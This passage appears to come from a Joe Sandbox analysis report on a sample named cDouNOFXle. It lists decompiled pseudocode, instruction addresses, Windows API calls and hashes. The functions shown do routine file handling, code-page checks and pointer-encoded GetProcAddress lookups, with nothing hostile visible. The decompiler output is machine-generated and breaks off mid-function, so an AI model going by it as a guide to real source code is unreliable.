						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E0008AEDD(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x9e82c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E0008AF8E(_t98);
				}
				L39:
				return E0007EC4A(_v8 ^ _t99);
			}

0x0008b358
0x0008b35f
0x0008b367
0x0008b36f
0x0008b374
0x0008b385
0x0008b385
0x0008b387
0x0008b389
0x0008b38b
0x0008b38e
0x0008b38e
0x0008b394
0x00000000
0x00000000
0x0008b39a
0x0008b39b
0x0008b39e
0x0008b3a1
0x0008b3a6
0x00000000
0x0008b3a8
0x0008b3a8
0x0008b3ae
0x0008b47c
0x0008b3b4
0x0008b3b4
0x0008b3ba
0x00000000
0x0008b3c0
0x0008b3c4
0x0008b3ca
0x0008b3cc
0x00000000
0x0008b3d2
0x0008b3d7
0x0008b3dd
0x0008b3df
0x0008b469
0x0008b46f
0x00000000
0x0008b471
0x0008b472
0x00000000
0x0008b472
0x0008b3e5
0x0008b3ef
0x0008b3f4
0x0008b3fc
0x0008b402
0x0008b403
0x0008b406
0x0008b459
0x0008b408
0x0008b408
0x0008b40c
0x0008b40f
0x0008b411
0x0008b411
0x0008b414
0x0008b416
0x00000000
0x00000000
0x0008b418
0x0008b41b
0x0008b426
0x0008b426
0x0008b428
0x00000000
0x00000000
0x0008b420
0x0008b425
0x0008b425
0x0008b425
0x0008b42a
0x0008b42d
0x0008b430
0x00000000
0x00000000
0x00000000
0x0008b430
0x0008b411
0x0008b432
0x0008b432
0x0008b435
0x0008b43a
0x0008b43a
0x0008b43d
0x0008b43e
0x0008b43e
0x0008b43e
0x0008b44e
0x0008b454
0x0008b454
0x0008b45e
0x0008b461
0x0008b462
0x0008b463
0x0008b527
0x0008b528
0x0008b52d
0x0008b52e
0x0008b52e
0x0008b3df
0x0008b3cc
0x0008b3ba
0x0008b3ae
0x00000000
0x0008b530
0x0008b48e
0x0008b496
0x0008b496
0x0008b49a
0x0008b49d
0x0008b4a3
0x0008b4a6
0x0008b4a6
0x0008b4a9
0x0008b4ab
0x0008b4ad
0x0008b4ad
0x0008b4b0
0x0008b4b2
0x00000000
0x00000000
0x0008b4b4
0x0008b4b7
0x0008b4d3
0x0008b4d3
0x0008b4d5
0x00000000
0x00000000
0x0008b4bc
0x0008b4c2
0x0008b4c4
0x0008b4ca
0x0008b4ce
0x0008b4ce
0x0008b4cf
0x00000000
0x0008b4cf
0x00000000
0x0008b4c2
0x0008b4d7
0x0008b4da
0x0008b4dd
0x00000000
0x00000000
0x00000000
0x0008b4dd
0x0008b4df
0x0008b4df
0x0008b4e2
0x0008b4e3
0x0008b4e6
0x0008b4e9
0x0008b4e9
0x0008b4ef
0x0008b4f2
0x0008b501
0x0008b50a
0x0008b50f
0x0008b515
0x0008b516
0x0008b516
0x0008b519
0x0008b51c
0x0008b51f
0x0008b522
0x0008b522
0x0008b522
0x00000000
0x0008b376
0x0008b377
0x0008b37d
0x0008b531
0x0008b540

APIs

Part of subcall function 0008AF1B: GetOEMCP.KERNEL32(00000000,?,?,0008B1A5,?), ref: 0008AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0008B1EA,?,00000000), ref: 0008B3C4
GetCPInfo.KERNEL32(00000000,0008B1EA,?,?,?,0008B1EA,?,00000000), ref: 0008B3D7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: fbd55467c6db7c8181e390722ab5ca64130692010cba9040a2e949a66beb2fd1
Instruction ID: 69a5698a8b8423c690e05ddab22f18ee3a2d3ca967ad3ca09e0e09e11a07f514
Opcode Fuzzy Hash: fbd55467c6db7c8181e390722ab5ca64130692010cba9040a2e949a66beb2fd1
Instruction Fuzzy Hash: 16513370A002459EEB20EF75C8826BBBBE5FF45310F18946ED0D68B253D7399946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00061385 Relevance: 3.1, APIs: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00061385(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0007E28C(_t56, _t91);
				_push(_t78);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00069619(_t78);
				 *_t89 = 0x935b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00066057(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0006C827(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0006151F();
				_t62 = E0006151F();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0007E24A(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0006B07D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0007F350(_t87, _t89 + 0x2208, 0, 0x40);
				E0007F350(_t87, _t89 + 0x2248, 0, 0x34);
				E0007F350(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00061385
0x00061385
0x00061385
0x00061385
0x00061385
0x0006138a
0x0006138b
0x0006138e
0x00061390
0x00061393
0x0006139a
0x000613a6
0x000613a9
0x000613b4
0x000613b8
0x000613c3
0x000613c9
0x000613cf
0x000613da
0x000613e2
0x000613e6
0x000613e9
0x000613ef
0x000613f5
0x000613f7
0x0006141c
0x000613f9
0x000613fe
0x00061404
0x00061407
0x0006140d
0x00061418
0x0006140f
0x00061411
0x00061411
0x0006140d
0x0006141f
0x0006142b
0x00061432
0x00061439
0x00061442
0x0006144d
0x00061457
0x0006145d
0x00061463
0x00061469
0x0006146f
0x00061475
0x0006147b
0x00061482
0x00061488
0x0006148e
0x00061494
0x0006149a
0x000614a0
0x000614af
0x000614be
0x000614c9
0x000614d1
0x000614d7
0x000614dd
0x000614e3
0x000614e9
0x000614ef
0x000614f5
0x000614fe
0x00061504
0x0006150a
0x00061512
0x0006151c

APIs

__EH_prolog.LIBCMT ref: 00061385

Part of subcall function 00066057: __EH_prolog.LIBCMT ref: 0006605C

Part of subcall function 0006C827: __EH_prolog.LIBCMT ref: 0006C82C
Part of subcall function 0006C827: new.LIBCMT ref: 0006C86F
Part of subcall function 0006C827: new.LIBCMT ref: 0006C893

new.LIBCMT ref: 000613FE

Part of subcall function 0006B07D: __EH_prolog.LIBCMT ref: 0006B082

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7b70ff70dd8d2af3737085430c5b28206e49b7e96f2c5de243582e784b59a3b7
Instruction ID: 0e1f699110dbacd471863b026c68ed1b32de3e87d855b65b692cee018efb4e83
Opcode Fuzzy Hash: 7b70ff70dd8d2af3737085430c5b28206e49b7e96f2c5de243582e784b59a3b7
Instruction Fuzzy Hash: FA4115B0805B40DEE724DF7984869E7FBE6FB18300F544A6ED6EE83282DB326554CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00061380 Relevance: 3.1, APIs: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00061380(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0007E28C(E00091CA7, _t91);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00069619(_t78);
				 *_t89 = 0x935b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00066057(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0006C827(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0006151F();
				_t62 = E0006151F();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0007E24A(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0006B07D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0007F350(_t87, _t89 + 0x2208, 0, 0x40);
				E0007F350(_t87, _t89 + 0x2248, 0, 0x34);
				E0007F350(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00061380
0x00061380
0x00061380
0x00061380
0x00061385
0x0006138e
0x00061390
0x00061393
0x0006139a
0x000613a6
0x000613a9
0x000613b4
0x000613b8
0x000613c3
0x000613c9
0x000613cf
0x000613da
0x000613e2
0x000613e6
0x000613e9
0x000613ef
0x000613f5
0x000613f7
0x0006141c
0x000613f9
0x000613fe
0x00061404
0x00061407
0x0006140d
0x00061418
0x0006140f
0x00061411
0x00061411
0x0006140d
0x0006141f
0x0006142b
0x00061432
0x00061439
0x00061442
0x0006144d
0x00061457
0x0006145d
0x00061463
0x00061469
0x0006146f
0x00061475
0x0006147b
0x00061482
0x00061488
0x0006148e
0x00061494
0x0006149a
0x000614a0
0x000614af
0x000614be
0x000614c9
0x000614d1
0x000614d7
0x000614dd
0x000614e3
0x000614e9
0x000614ef
0x000614f5
0x000614fe
0x00061504
0x0006150a
0x00061512
0x0006151c

APIs

__EH_prolog.LIBCMT ref: 00061385

Part of subcall function 00066057: __EH_prolog.LIBCMT ref: 0006605C

Part of subcall function 0006C827: __EH_prolog.LIBCMT ref: 0006C82C
Part of subcall function 0006C827: new.LIBCMT ref: 0006C86F
Part of subcall function 0006C827: new.LIBCMT ref: 0006C893

new.LIBCMT ref: 000613FE

Part of subcall function 0006B07D: __EH_prolog.LIBCMT ref: 0006B082

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bb4af894ffb6a512b9c7dd1e8675915e9a266d73c5e0ae58ef734c7f1f7c9b86
Instruction ID: 5c4e9332c53c199ac08822ec0222b3f21eeda5a55751ebf82d50ed996c6bc44d
Opcode Fuzzy Hash: bb4af894ffb6a512b9c7dd1e8675915e9a266d73c5e0ae58ef734c7f1f7c9b86
Instruction Fuzzy Hash: 534104B0805B409EE724DF798486AE7FBE6FF18300F544A6ED1EE83282DB366554CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0006971E Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0006971E(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E0007E360();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x22)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x1c) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E0006BC69(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E0006B66C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x18)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E0006FE56(_t59 + 0x24, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}

0x00069723
0x00069729
0x00069736
0x00069738
0x0006973e
0x0006974c
0x0006974c
0x00069746
0x00069746
0x00069746
0x00069756
0x0006976b
0x00069774
0x0006977a
0x00069784
0x00000000
0x00069786
0x00069786
0x0006978a
0x0006978c
0x0006978c
0x00069792
0x00069792
0x00069792
0x00069796
0x00069796
0x000697a6
0x000697ac
0x000697ac
0x000697b3
0x000697e1
0x000697e1
0x000697f3
0x000697f8
0x000697fb
0x00069814

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00069EDC,?,?,00067867), ref: 000697A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00069EDC,?,?,00067867), ref: 000697DB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6628b436db233531096230c72ed6df14141512bf6e74f37c87d50f744f5c5b1e
Instruction ID: b56ca3669762628fcb68e1ab998bce480585580cec524a20622fcdba6941ecb4
Opcode Fuzzy Hash: 6628b436db233531096230c72ed6df14141512bf6e74f37c87d50f744f5c5b1e
Instruction Fuzzy Hash: E32123B0008748AFE7308F24C885BA7B7EDEB49764F00492DF1E582592C374AC899B21

Uniqueness

Uniqueness Score: -1.00%

Function 00069D62 Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00069D62(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x1c) != 0x100 && ( *(__ecx + 0x1c) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00070BDD(_t51, _t57,  &_v24);
				}
				if(_v26 != 0) {
					E00070BDD(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00070BDD(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}

0x00069d62
0x00069d68
0x00069d71
0x00069d7c
0x00069d7c
0x00069d82
0x00069d88
0x00069d8b
0x00069d98
0x00069d94
0x00069d94
0x00069d94
0x00069d9a
0x00069d9b
0x00069d9f
0x00069da5
0x00069db2
0x00069db2
0x00069da7
0x00069dac
0x00069db0
0x00000000
0x00000000
0x00069db0
0x00069db7
0x00069dbd
0x00069dc7
0x00069dc7
0x00069dcb
0x00069dd2
0x00069dd2
0x00069ddc
0x00069de5
0x00069de5
0x00069ded
0x00069df6
0x00069df6
0x00069e06
0x00069e14
0x00069e24
0x00069e2c
0x00069e38

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00067547,?,?,?,?), ref: 00069D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00069E2C

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: dd6286fbdd534eabf7968c3e3c54e0db19195d7cbbbd71e019567ba5fabfc430
Instruction ID: 2567dac91c1d358af6e37b3eae0523e80e909735da4d39e2d12986c4690daee9
Opcode Fuzzy Hash: dd6286fbdd534eabf7968c3e3c54e0db19195d7cbbbd71e019567ba5fabfc430
Instruction Fuzzy Hash: B821D331248246ABC714DE24C891AABBBE9AF95708F04492DB8C187951D339EA0CDBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A458 Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0008A458(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xc1630 + _a4 * 4;
				_t27 =  *0x9e668; // 0x136d1c5
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x9e668; // 0x136d1c5
							goto L13;
						}
						 *_t20 = E0007E531(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E0008A4F4( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x9e668; // 0x136d1c5
						goto L7;
					}
					_t27 =  *0x9e668; // 0x136d1c5
					goto L8;
				}
				L2:
				return _t33;
			}

0x0008a463
0x0008a46c
0x0008a472
0x0008a47c
0x0008a47e
0x0008a482
0x0008a4ed
0x00000000
0x0008a4ed
0x0008a486
0x0008a48c
0x0008a492
0x0008a4ae
0x0008a4ae
0x0008a4b0
0x0008a4b2
0x0008a4dd
0x0008a4df
0x0008a4e7
0x0008a4eb
0x00000000
0x0008a4eb
0x0008a4be
0x0008a4c2
0x0008a4d7
0x00000000
0x0008a4d7
0x0008a4cb
0x00000000
0x00000000
0x00000000
0x00000000
0x0008a494
0x0008a494
0x0008a496
0x0008a49e
0x00000000
0x00000000
0x0008a4a0
0x0008a4a6
0x00000000
0x00000000
0x0008a4a8
0x00000000
0x0008a4a8
0x0008a4cf
0x00000000
0x0008a4cf
0x0008a488
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,00093958), ref: 0008A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0008A4C5

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 1820d55c592205e5274c4eab3fcb79429834a6aac19c42ecdcec95ef724efaa0
Instruction ID: e2adb1927971a7490506a15551540deb38858736bf1f47f8a099a9ced6549683
Opcode Fuzzy Hash: 1820d55c592205e5274c4eab3fcb79429834a6aac19c42ecdcec95ef724efaa0
Instruction Fuzzy Hash: C0113A33B011205BBF31EE28EC4489A73D1BBC27747164122FD55AB654EA78DC01C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00069B59 Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00069B59(void* __esi) {
				long _t14;
